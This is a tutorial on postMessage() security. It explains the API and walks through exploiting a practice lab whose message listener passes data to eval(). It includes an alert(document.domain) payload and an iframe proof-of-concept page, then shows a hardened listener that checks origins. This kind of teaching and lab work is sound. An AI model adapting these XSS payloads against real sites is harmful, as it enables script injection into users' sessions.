postMessage() security
postMessage() method
This method enables communication between two pages if they originate from the same protocol and port number. It provides a secure mechanism for communication if it is set up properly.
In communication, two methods are generally used :
- postMessage() : sends data
- addEventListener() : listens for data
Syntax
1. postMessage() :
postMessage(message, targetOrigin)
postMessage(message, targetOrigin, transfer)
message => data/payload you want to send to the other window.
targetOrigin => origin of the target window that will receive the message; if the target's origin does not match, the message won't be sent. Alternatively "*" can be specified as targetOrigin, which means the target window can have any origin.
2. addEventListener() :
window.addEventListener("message", (event) => {
// whatever content; the received payload is event.data and the sender's origin is event.origin
}, false) // third argument: useCapture (true/false)
"message" => the event type to listen for; the data/payload sent from the other window arrives as event.data.
function => defines what action will be performed when the data/payload is received.
More info :
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
Where is the Bug
First, to exploit a postMessage bug the application must use web messaging. If the application uses web messaging, the listener ( addEventListener ) should be identified.
Tool to identify listeners :
postMessage-tracker extension created by Frans Rosén :
Chrome :
https://github.com/fransr/postMessage-tracker
Firefox [forked from fransr] :
https://github.com/sumeet-darekar/postMessage-tracker
Vulnerabilities that can be found via postMessage include : XSS, information disclosure, authentication misconfiguration and many more.
Example : Describing Bug
https://xss-lab-brown.vercel.app/
This application is vulnerable to postMessage() XSS, so let's exploit it.
First, identify whether there is any listener on the application using the extension above.
Yes, there is an addEventListener() method in the JavaScript; let's analyse it.
So the application takes our payload/data and puts it into an eval function for further processing. As our payload/data ends up in eval, let's run JavaScript there.
Open the console by pressing the 'Esc' key, then send a malicious postMessage() payload.
By using alert() we can pop up an alert, which shows that we can run JavaScript on the application.
payload = window.postMessage('alert(document.domain)','*')
Now, exploiting the vulnerability by using an iframe hosted on replit.com.
Code to exploit :
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>replit</title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<script>
// Runs once the framed lab page has loaded and sends it the payload;
// the lab's listener passes event.data to eval(), so the alert fires.
function exploit() {
  const payload = "alert(document.domain)";
  document.getElementById("target").contentWindow.postMessage(payload, "*");
}
</script>
Hello world
<iframe src="https://xss-lab-brown.vercel.app/" id="target" onload="exploit()"></iframe>
<script src="script.js"></script>
</body>
</html>
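The lab's listener is vulnerable because it never checks event.origin and hands event.data to eval(). As an added example (not code from the original post or the lab), here is how a hardened "message" listener and sender look; the origins and action names are assumed sample values.

```javascript
// Added example (not from the original post): a hardened "message" listener.
// The lab's listener passes event.data straight to eval(); this handler instead
// (1) checks event.origin against an allow-list, (2) requires a structured
// message, and (3) dispatches only to a fixed table of actions, never to eval.

// Origins allowed to talk to this page (assumption: example values).
const ALLOWED_ORIGINS = new Set(["https://app.example.com", "https://partner.example.com"]);

// Fixed set of actions the page is willing to perform for a remote window.
const ACTIONS = {
  setTheme: (p) => (["light", "dark"].includes(p.theme) ? { theme: p.theme } : null),
  showNotice: (p) => (typeof p.text === "string" && p.text.length <= 200 ? { notice: p.text } : null),
};

// Returns { ok: true, result } when the message is accepted, otherwise { ok: false, reason }.
function handleMessage(event) {
  if (!ALLOWED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: "origin not allowed: " + event.origin };
  }
  const msg = event.data;
  if (typeof msg !== "object" || msg === null || typeof msg.action !== "string") {
    return { ok: false, reason: "malformed message" };
  }
  // hasOwnProperty guards against prototype names such as "constructor" resolving to a function.
  const handler = Object.prototype.hasOwnProperty.call(ACTIONS, msg.action) ? ACTIONS[msg.action] : undefined;
  if (!handler) {
    return { ok: false, reason: "unknown action: " + msg.action };
  }
  const result = handler(msg.payload ?? {});
  return result ? { ok: true, result } : { ok: false, reason: "invalid payload" };
}

// Sender side: refuse the "*" wildcard so data is never delivered to an unexpected origin.
function sendMessage(targetWindow, message, targetOrigin) {
  if (targetOrigin === "*") throw new Error("refusing wildcard targetOrigin");
  targetWindow.postMessage(message, targetOrigin);
}

// In the browser: window.addEventListener("message", handleMessage, false);
// Constructed events for a stand-alone check (no browser needed).
function demo() {
  return [
    handleMessage({ origin: "https://evil.example", data: { action: "setTheme", payload: { theme: "dark" } } }),
    handleMessage({ origin: "https://app.example.com", data: "alert(document.domain)" }),
    handleMessage({ origin: "https://app.example.com", data: { action: "setTheme", payload: { theme: "dark" } } }),
  ];
}
```

The second constructed event is the lab's own payload string: with an origin check and a structured-message requirement it is rejected before any code could run.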
More Resources :
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
https://www.yeswehack.com/learn-bug-bounty/introduction-postmessage-vulnerabilities
https://payatu.com/blog/postmessage-vulnerabilities/
More practice labs :
https://public-firing-range.appspot.com/dom/index.html
https://github.com/payatu/vuln-nodejs-app
sayonara ^_^